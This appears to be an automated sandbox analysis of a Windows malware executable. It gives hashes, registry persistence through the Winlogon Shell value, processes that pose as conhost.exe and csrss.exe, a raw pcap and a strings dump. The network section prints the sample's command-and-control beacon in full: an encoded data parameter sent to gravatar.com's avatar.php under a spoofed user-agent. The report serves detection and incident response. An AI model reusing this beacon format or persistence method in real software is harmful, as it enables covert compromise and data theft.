Analysis Date: 2014-08-28 19:38:27
MD5: faa8e39577c7f2bb86d64e0dbea3f52d
SHA1: 921d3a827b13db86cba8ae9d5cfb6932ccb519b6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text  md5: cfca97af2af4e443db83e437c11c6145 sha1: 6a69343565194206040fa5aa1893bed1cc719f33 size: 177152
Section .rdata md5: 68cf7ddb03e63cee60250514d5742274 sha1: b0203599664433ac966266d6fcc45e78691bc812 size: 2048
Section .data  md5: c5228b16da96b9ff17d59a4aa001ab55 sha1: 47f68948d5a2e5c4ba6f749b367c3f64bca55eb9 size: 21504
Section .lib   md5: b98f176478096ec4e4ce0d7ea38604f3 sha1: 10e53ef3777dbc261be3e9e530e8443ba01f4a1e size: 512
Timestamp: 2005-09-25 04:36:33 (PE header compile timestamp; trivially forgeable, do not rely on it for dating the sample)
Version: PrivateBuild: 1522
PEhash: c4dc7f24e0cb68e49573d5445103676ab33e5701
IMPhash: 4c2ce85f346df42394d25c8a8f64a654

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
  (persistence: the dropped dwm.exe is appended to the per-user Winlogon Shell value, so it is started alongside explorer.exe at the next logon of this user)
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
  (note: conhost.exe and csrss.exe are names of legitimate Windows system binaries, but here they are written to and launched from user-writable Application Data and Temp directories rather than System32 — a path/name mismatch worth hunting for)
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: zonekg.com
Winsock DNS: gravatar.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: gravatar.com
Type: A
192.0.80.241
DNS: gravatar.com
Type: A
192.0.80.242
DNS: gravatar.com
Type: A
192.0.80.239
DNS: gravatar.com
Type: A
192.0.80.240
DNS: zonekg.com
Type: A
(no address recorded for this query in this run)
HTTP GET: http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v66=66&tq=gKZEtzymtSpDE%2FH6wLwSoh1vUZeBxJ372eLH4rw4LADAq%2F1jZrHrICRe7NJto1CugYzMyc69NDh1kAfaXKi3PuL0pp6GY2NjElj53tmf6DIM7rMGyPJeFOrboW60I1fCqsj0PG7FcnCr3oFR0iEIxJ36%2B8QfCaAzaW8nCOBW5YV8geRijtcdcI540CEvMM4ebL14YtA8a%2BMl%2B24iJVYFOz4%2FSReMvzQr2yWRYNBeHAsQYYC3sFBpPx92gQnez4PCzzoZMTLkHG%2Fk3q4KVjdvnqPFmomOfD%2BLa4y46qn2k5NJjXhDLX2AdH2UrAjC97jvym8Vq4c8kBcmkFFKYKUF6w6L4BnjTJIUFoPamlyeQF2lCdtICk9kHMkSVS5aqU1jZkxu1axEwuitEGgjSM7HJE7SKdiNKFwF3Ct5e%2FiXMjpnzomFQrWUL%2FHxfHom6EDgnrIkq7M9rNR5XtIUEoU1UmRYb6VME4
User-Agent: mozilla/2.0
  (non-standard, lowercase user-agent string; together with the long encoded `tq=` parameter appended to an otherwise ordinary avatar.php request, this is the more useful network indicator — gravatar.com is a legitimate public service, so the domain and its resolved addresses alone are not suitable blocklist entries)
Flows TCP: 192.168.1.1:1031 ➝ 192.0.80.241:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763636   bcfe64067be2?v66
0x00000040 (00064)   3d363626 74713d67 4b5a4574 7a796d74   =66&tq=gKZEtzymt
0x00000050 (00080)   53704445 25324648 36774c77 536f6831   SpDE%2FH6wLwSoh1
0x00000060 (00096)   76555a65 42784a33 3732654c 48347277   vUZeBxJ372eLH4rw
0x00000070 (00112)   344c4144 41712532 46316a5a 72487249   4LADAq%2F1jZrHrI
0x00000080 (00128)   43526537 4e4a746f 31437567 597a4d79   CRe7NJto1CugYzMy
0x00000090 (00144)   6336394e 4468316b 41666158 4b693350   c69NDh1kAfaXKi3P
0x000000a0 (00160)   754c3070 70364759 324e6a45 6c6a3533   uL0pp6GY2NjElj53
0x000000b0 (00176)   746d6636 44494d37 724d4779 504a6546   tmf6DIM7rMGyPJeF
0x000000c0 (00192)   4f72626f 57363049 31664371 736a3050   OrboW60I1fCqsj0P
0x000000d0 (00208)   47374663 6e437233 6f465230 69454978   G7FcnCr3oFR0iEIx
0x000000e0 (00224)   4a333625 32423851 66436141 7a615738   J36%2B8QfCaAzaW8
0x000000f0 (00240)   6e434f42 57355956 38676552 696a7463   nCOBW5YV8geRijtc
0x00000100 (00256)   64634935 34304345 764d4d34 65624c31   dcI540CEvMM4ebL1
0x00000110 (00272)   34597441 38612532 424d6c25 32423234   4YtA8a%2BMl%2B24
0x00000120 (00288)   694a5659 464f7a34 25324653 52654d76   iJVYFOz4%2FSReMv
0x00000130 (00304)   7a517232 79575259 4e426548 41735159   zQr2yWRYNBeHAsQY
0x00000140 (00320)   59433373 46427050 78393267 516e657a   YC3sFBpPx92gQnez
0x00000150 (00336)   3450437a 7a6f5a4d 544c6b48 47253246   4PCzzoZMTLkHG%2F
0x00000160 (00352)   6b337134 4b566a64 766e7150 466d6f6d   k3q4KVjdvnqPFmom
0x00000170 (00368)   4f664425 32424c61 34793436 716e326b   OfD%2BLa4y46qn2k
0x00000180 (00384)   354e4a6a 5868444c 58324164 48325572   5NJjXhDLX2AdH2Ur
0x00000190 (00400)   416a4339 376a7679 6d385671 3463386b   AjC97jvym8Vq4c8k
0x000001a0 (00416)   42636d6b 46464b59 4b554636 77364c34   BcmkFFKYKUF6w6L4
0x000001b0 (00432)   426e6a54 4a495546 6f50616d 6c796551   BnjTJIUFoPamlyeQ
0x000001c0 (00448)   46326c43 64744943 6b396b48 4d6b5356   F2lCdtICk9kHMkSV
0x000001d0 (00464)   53356171 55316a5a 6b787531 61784577   S5aqU1jZkxu1axEw
0x000001e0 (00480)   75697445 47676a53 4d37484a 4537534b   uitEGgjSM7HJE7SK
0x000001f0 (00496)   64694e4b 46774633 43743565 25324669   diNKFwF3Ct5e%2Fi
0x00000200 (00512)   584d6a70 6e7a6f6d 46517257 554c2532   XMjpnzomFQrWUL%2
0x00000210 (00528)   46487866 486f6d36 4544676e 72496b71   FHxfHom6EDgnrIkq
0x00000220 (00544)   374d3972 4e523558 74495545 6f553155   7M9rNR5XtIUEoU1U
0x00000230 (00560)   6d525962 36564d45 34204854 54502f31   mRYb6VME4 HTTP/1
0x00000240 (00576)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000250 (00592)   636c6f73 650d0a48 6f73743a 20677261   close..Host: gra
0x00000260 (00608)   76617461 722e636f 6d0d0a41 63636570   vatar.com..Accep
0x00000270 (00624)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000280 (00640)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000290 (00656)   0a0d0a                                ...


Strings
.g.X;.4....
.d.
v
X.LNaz
.S\.5..h....
U..
......C..
d...
.f..[(.
.^}..
.
@
i...y/...q...
....D
...
....<.5.
j
.....
..|.
a..p.....no2"rK..Q$...
|.'L....
...H..^2..\...FI
.
..
?B.....R.y.f....y..s....
v.{Gm...
7l@X,.....)
..BK
.
040904b0
1522
Df%S
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
.2ER+/
>4`-R8>
[5?:u0
6~ 44S
6b	Ls Rb
71T}m;uO
7,n^l@
7!=p$Cu/
+{8IV_!
~)9W@b
aK_>7L
CallNextHookEx
ChildWindowFromPoint
ClipCursor
COMCTL32.dll
comdlg32.dll
CompareStringW
CQw."E
CreateFiber
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DQu'w%3
DrawEdge
E(cd9y
EmptyClipboard
EnumResourceNamesW
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlushFileBuffers
gbs'rL
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
h>;/^R
i8WirV'
;Ii/6K(J
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
;&j:|F
J#g8)HmovA
Ji[nzg
JRichu
KERNEL32.dll
Kk/o+"
)k!Tl{
LiXaPk#d
LocalAlloc
LockFile
lO[QCp
MonitorFromWindow
M)[VQnw
Mw`kJ0
N1gj3:
NdrClientCall
:]Nj\j
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
pZ:,:O
QtI%DX
 ~ R4Y
`.rdata
RegisterClassW
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetEndOfFile
SetScrollRange
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
s"O	pF
stUV^^
TDo?H|
!This program cannot be run in DOS mode.
_]TlT!
ToAscii
>	t>oN
tXK7=c
Tz)V(B
u.e14#
U_Lu=!
UnhookWindowsHookEx
UnlockFile
USER32.dll
VerLanguageNameW
vT"u-Y
=VY[t?
wC5Te0>
WinHelpW
w\KO_/
-wM[m|
WriteFileGather
!WS[cfl
x7(kx'
Xj'2a0V
\",$Xk
>xq%P&
xUjlU_A
x._x4e
yCFDWj
Z5k*}nn2
ZJ-%V8g
zLJ;mD
Z+.):X-l